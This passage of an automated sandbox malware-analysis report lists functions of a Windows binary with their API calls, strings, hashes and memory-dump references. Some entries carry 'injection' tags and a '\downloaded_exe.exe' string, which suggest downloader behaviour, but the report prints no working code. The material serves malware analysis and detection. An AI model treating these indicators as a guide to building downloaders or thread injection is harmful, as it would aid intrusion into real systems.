                                                        • Opcode Fuzzy Hash: aaebf5af70e80af6eb5122cb4d70a170c33787dcb1e557bfbc8777c91e7bf471
                                                        • Instruction Fuzzy Hash: 6D41AC62B1C30A85FA10B762ED153BA9A95AF85B84F844036D90D477D2DFECE580C729
                                                        Function 00007FF70203C270 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 87libraryloadermemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TlsAlloc.KERNEL32 ref: 00007FF70203C2AD
                                                        • abort.MSVCRT(?,?,00007FF70211C190,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAE66
                                                        • abort.MSVCRT(?,?,00007FF70211C190,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAE6C
                                                        • GetModuleHandleA.KERNEL32 ref: 00007FF7020EAEBD
                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAEDC
                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAEEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: AddressProcabort$AllocHandleModulecalloc
                                                        • String ID: once %p is %ld$AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                                                        • API String ID: 3654027789-2209695033
                                                        • Opcode ID: 09f8cb5ec888f493a4a95b8d2f7d0d590038ce4e317440cd75bbc5e5f6f08d46
                                                        • Instruction ID: a7525cd7070cce04a930408ff74d2b91cd68b6055089a8ec3cd2f2264e0e76f3
                                                        • Opcode Fuzzy Hash: 09f8cb5ec888f493a4a95b8d2f7d0d590038ce4e317440cd75bbc5e5f6f08d46
                                                        • Instruction Fuzzy Hash: 57317E23F4E70A85E955BB15BC442B8ABA4BF45B98FC40131CD4D937A1DFBCA485C364
                                                        Function 00007FF70203BE20 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 49libraryloadermemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • TlsAlloc.KERNEL32 ref: 00007FF70203BE24
                                                        • abort.MSVCRT ref: 00007FF7020EAE60
                                                        • abort.MSVCRT(?,?,00007FF70211C190,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAE66
                                                        • abort.MSVCRT(?,?,00007FF70211C190,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAE6C
                                                        • GetModuleHandleA.KERNEL32 ref: 00007FF7020EAEBD
                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAEDC
                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF70203D319,?,?,?,?,00007FF70203F89F), ref: 00007FF7020EAEEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: abort$AddressProc$AllocHandleModule
                                                        • String ID: AddVectoredExceptionHandler$RemoveVectoredExceptionHandler$kernel32.dll
                                                        • API String ID: 129120984-3889795909
                                                        • Opcode ID: 64362a05e72daf46c325a16987378e78630ad6eb936338ce636ea64436b19db3
                                                        • Instruction ID: 6b6d8e99dbe92eacdc0c438990caa3a6e70cfd8051fa3af246f6154bb3b86d32
                                                        • Opcode Fuzzy Hash: 64362a05e72daf46c325a16987378e78630ad6eb936338ce636ea64436b19db3
                                                        • Instruction Fuzzy Hash: 87115B26E5AB0AC1EA40BB29FC85264ABA4FF49354FC05531D84C83760EFBCE092C324
                                                        Function 00007FF70202F2C0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaiseUnwindabort
                                                        • String ID: CCG $CCG!$CCG!$CCG"
                                                        • API String ID: 4140830120-3707373406
                                                        • Opcode ID: fdbaa5ed3b182782ff1668f56196a258e5c65cf7b574964e4c7cd600521834dc
                                                        • Instruction ID: baa3205497483b3d4a2092ebe82f78e49e157b5f63ca6af8dfa8e25293684964
                                                        • Opcode Fuzzy Hash: fdbaa5ed3b182782ff1668f56196a258e5c65cf7b574964e4c7cd600521834dc
                                                        • Instruction Fuzzy Hash: C951A133A18B8182D7609B15E8846ADB770FB89BD4F505236EE8D13B58DF7CD585C704
                                                        Function 00007FF70203D810 Relevance: 15.2, APIs: 10, Instructions: 191threadinjectionsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: Thread$Event$Context$AllocHandleInformationObjectResumeSingleSuspendValueWait
                                                        • String ID:
                                                        • API String ID: 1746956495-0
                                                        • Opcode ID: 9a323a65cf3f4b9f3a17786a34d9b1347c9a88487e0783df76295987beb82805
                                                        • Instruction ID: 96b9df27f990fd56496a305395a4fb4975275b62e6473d0541114a925f45fecf
                                                        • Opcode Fuzzy Hash: 9a323a65cf3f4b9f3a17786a34d9b1347c9a88487e0783df76295987beb82805
                                                        • Instruction Fuzzy Hash: F9818323A0DB4685EB65BB35AE00278AF68EF45B68F844231DD1D473D5DFACE441C368
                                                        Function 00007FF70203A2C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 204synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: ValueWait$EventMultipleObjectObjectsResetSingle
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 2327612466-1839852069
                                                        • Opcode ID: 4ae3e4eef2b2aa23eb8c4cdc7ecc265f0af12ecd826e8298f12dc24dcec226ad
                                                        • Instruction ID: c7ce69091f45bc874bf1825df88c1f7e283b8e2e860b71b3dec06aa9384621e0
                                                        • Opcode Fuzzy Hash: 4ae3e4eef2b2aa23eb8c4cdc7ecc265f0af12ecd826e8298f12dc24dcec226ad
                                                        • Instruction Fuzzy Hash: 8C617023F0C31342FA6476266E4527AD98D6F857A4FD44131ED8E826D1EFECE841C279
                                                        Function 00007FF7020523A0 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 314stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: strlen
                                                        • String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
                                                        • API String ID: 39653677-1250104765
                                                        • Opcode ID: c0f23cdd05b292e8055d528231603e003c3106ee51092c0c5fe9a1c116001b88
                                                        • Instruction ID: 20413d68093cbc4cbf3e7cfea5cc9eda639b0ec5aebc7ee8702500b494e610aa
                                                        • Opcode Fuzzy Hash: c0f23cdd05b292e8055d528231603e003c3106ee51092c0c5fe9a1c116001b88
                                                        • Instruction Fuzzy Hash: 53A17E27A19B5695EE61AF1AE8500AEAB60FF48FD4BC84432DE0C07764DF7CE552C324
                                                        Function 00007FF70202F8A0 Relevance: 13.7, APIs: 9, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: abort
                                                        • String ID:
                                                        • API String ID: 4206212132-0
                                                        • Opcode ID: 7448909c4f157810dbee92f511132c59ac9cbabcd0a6359bb5de95b2ed73c929
                                                        • Instruction ID: 460e57e7f2419d35c0f151a969d372dabd37d3b173afe8abe1fe67ef3402ba18
                                                        • Opcode Fuzzy Hash: 7448909c4f157810dbee92f511132c59ac9cbabcd0a6359bb5de95b2ed73c929
                                                        • Instruction Fuzzy Hash: 2D51A223B49B0794FA15BB11EC452B8AB64EF54B84FD88436DA0D07B91DFBCE446C328
                                                        Function 00007FF70203A610 Relevance: 13.6, APIs: 9, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Delete$CloseEnterHandleLeave$free
                                                        • String ID:
                                                        • API String ID: 3899327206-0
                                                        • Opcode ID: e0a7572ebb71b0e07c7657872da23c9035fa20bee9234153dddc28490b9ba3cd
                                                        • Instruction ID: dec48a1ea2e6e326a4b300e1024888196321924d50f28e55e057ff4fd31a721d
                                                        • Opcode Fuzzy Hash: e0a7572ebb71b0e07c7657872da23c9035fa20bee9234153dddc28490b9ba3cd
                                                        • Instruction Fuzzy Hash: 8A41A523B0860545E751AB26BD107E96659AF81BB8FCC0232DD6D473D0DFBCD482C324
                                                        Function 00007FF70203A190 Relevance: 13.6, APIs: 9, Instructions: 81COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • calloc.MSVCRT ref: 00007FF70203A1BB
                                                        • CreateSemaphoreA.KERNEL32 ref: 00007FF70203A1EE
                                                        • CreateSemaphoreA.KERNEL32 ref: 00007FF70203A204
                                                        • InitializeCriticalSection.KERNEL32(?,00007FF70211C190,00007FF70203EFE8,?,?,00007FF70211C190,00000000,00007FF70203F075,00007FF70211C190,?,00007FF70211C190,00007FF70203F609,00007FF7020ECDA0,?,00007FF70211C190), ref: 00007FF70203A22C
                                                        • InitializeCriticalSection.KERNEL32(?,00007FF70211C190,00007FF70203EFE8,?,?,00007FF70211C190,00000000,00007FF70203F075,00007FF70211C190,?,00007FF70211C190,00007FF70203F609,00007FF7020ECDA0,?,00007FF70211C190), ref: 00007FF70203A232
                                                        • InitializeCriticalSection.KERNEL32(?,00007FF70211C190,00007FF70203EFE8,?,?,00007FF70211C190,00000000,00007FF70203F075,00007FF70211C190,?,00007FF70211C190,00007FF70203F609,00007FF7020ECDA0,?,00007FF70211C190), ref: 00007FF70203A238
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                                        • String ID:
                                                        • API String ID: 2075313795-0
                                                        • Opcode ID: 6a3a739489306ebe4d864dbba85c8c50439e346a504c1e82662adcf5d533c83c
                                                        • Instruction ID: 4267b548921dc2d027a7ae90ff5872efe6cd98428166c5bdd2cb468cdd3e7974
                                                        • Opcode Fuzzy Hash: 6a3a739489306ebe4d864dbba85c8c50439e346a504c1e82662adcf5d533c83c
                                                        • Instruction Fuzzy Hash: E621E333B0D70285FB59AF69FA103B86A94AF85B94F9981358E5D477C4EF7D9480C320
                                                        Function 00007FF70202E340 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: QueryVirtual
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                        • API String ID: 1804819252-1534286854
                                                        • Opcode ID: 42644c4d23a266a8b51133e8263276f88c2ebfd595c8cc15d9af7b309d9a5261
                                                        • Instruction ID: d9183acd5a39342bfdc3d8b8a54dcdd80c6c976acda0550bc6c056d8f9351df4
                                                        • Opcode Fuzzy Hash: 42644c4d23a266a8b51133e8263276f88c2ebfd595c8cc15d9af7b309d9a5261
                                                        • Instruction Fuzzy Hash: 7A51AF37B48B4692EA10AB15EC406A9EF60FF88B94F844232DE4C47794DFBCE549C764
                                                        Function 00007FF70203D5F0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: AllocValue
                                                        • String ID: \downloaded_exe.exe
                                                        • API String ID: 1189806713-1839852069
                                                        • Opcode ID: 08d02fd64a53240e382f94b3b39b90375052e494897ec85d9082f73029a9108c
                                                        • Instruction ID: 31db3d2f03100584c5ef1b6b611901ba4b7034cee6e894f8282689f49eb961c9
                                                        • Opcode Fuzzy Hash: 08d02fd64a53240e382f94b3b39b90375052e494897ec85d9082f73029a9108c
                                                        • Instruction Fuzzy Hash: BB41A713F0E31686FE557B757E412B8AE586F44B58F880534DD1D463D2EFACA881C278
                                                        Function 00007FF70204135A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: abortfwrite$CaptureContextUnwindfputcfputs
                                                        • String ID: what(): $terminate called recursively
                                                        • API String ID: 918577357-2063472960
                                                        • Opcode ID: f46425aadf5c88d64a9900d8350695ff26af6c8952eb73536d8498a4a6ebdbf8
                                                        • Instruction ID: 97d8d4dfecf9daaa92f7ff2b23ddeb55bba0b2b06a60fdb6e8fc7d9036db71a2
                                                        • Opcode Fuzzy Hash: f46425aadf5c88d64a9900d8350695ff26af6c8952eb73536d8498a4a6ebdbf8
                                                        • Instruction Fuzzy Hash: B921CD63B1870A80EE14BB65EC153B9DA54AF85B88F804039DA0D4B7D2DFECE480C328
                                                        Function 00007FF702050230 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcmp$strlen
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                        • API String ID: 3738950036-1697194757
                                                        • Opcode ID: be1c8fd77399e2ab5423574e8d5fddc3093c7dff39e555f5e8ac5cf9d5af4a35
                                                        • Instruction ID: 3435a50bd53bbacf1986426b6b2e4339a8abf124955878450e42d3f1570a43c7
                                                        • Opcode Fuzzy Hash: be1c8fd77399e2ab5423574e8d5fddc3093c7dff39e555f5e8ac5cf9d5af4a35
                                                        • Instruction Fuzzy Hash: 1A51F493B0875A42FE10A616EC402E99A459F18BE4FD84631EE1C577D1DF9CE9C2C318
                                                        Function 00007FF702044650 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 233stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: memcmp$strlen
                                                        • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                                                        • API String ID: 3738950036-1697194757
                                                        • Opcode ID: 882efa3652c3bc54c434c024a7ed3dfcf850574981602a60d09fa9ecb2c6357c
                                                        • Instruction ID: 74e07d9db418a62873897df299666c836b702f04ccc70d1dc41c845aedda43a3
                                                        • Opcode Fuzzy Hash: 882efa3652c3bc54c434c024a7ed3dfcf850574981602a60d09fa9ecb2c6357c
                                                        • Instruction Fuzzy Hash: 3B51F8E3F0878681EE04A626AD402F496555F15BE4FD88631EE2C57BD1DFDCE982C318
                                                        Function 00007FF70203AA30 Relevance: 10.7, APIs: 7, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF70203A570: EnterCriticalSection.KERNEL32(00000086,000000AE,?,00007FF70211C190,00007FF70203AD51), ref: 00007FF70203A596
                                                          • Part of subcall function 00007FF70203A570: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70211C190), ref: 00007FF70203A5BB
                                                        • TryEnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF70211C190,?,?,00000000,00007FF70211C190,?,?), ref: 00007FF70203AAA3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$Enter$Leave
                                                        • String ID:
                                                        • API String ID: 2801635615-0
                                                        • Opcode ID: 736426b891218fbea09b3a15e0360ecde6aeafeff2292efda3971caa4a1e2837
                                                        • Instruction ID: b533797190f0df8aba13f743cceee194ec4b29d62f91b2193f18bb20010dc1ee
                                                        • Opcode Fuzzy Hash: 736426b891218fbea09b3a15e0360ecde6aeafeff2292efda3971caa4a1e2837
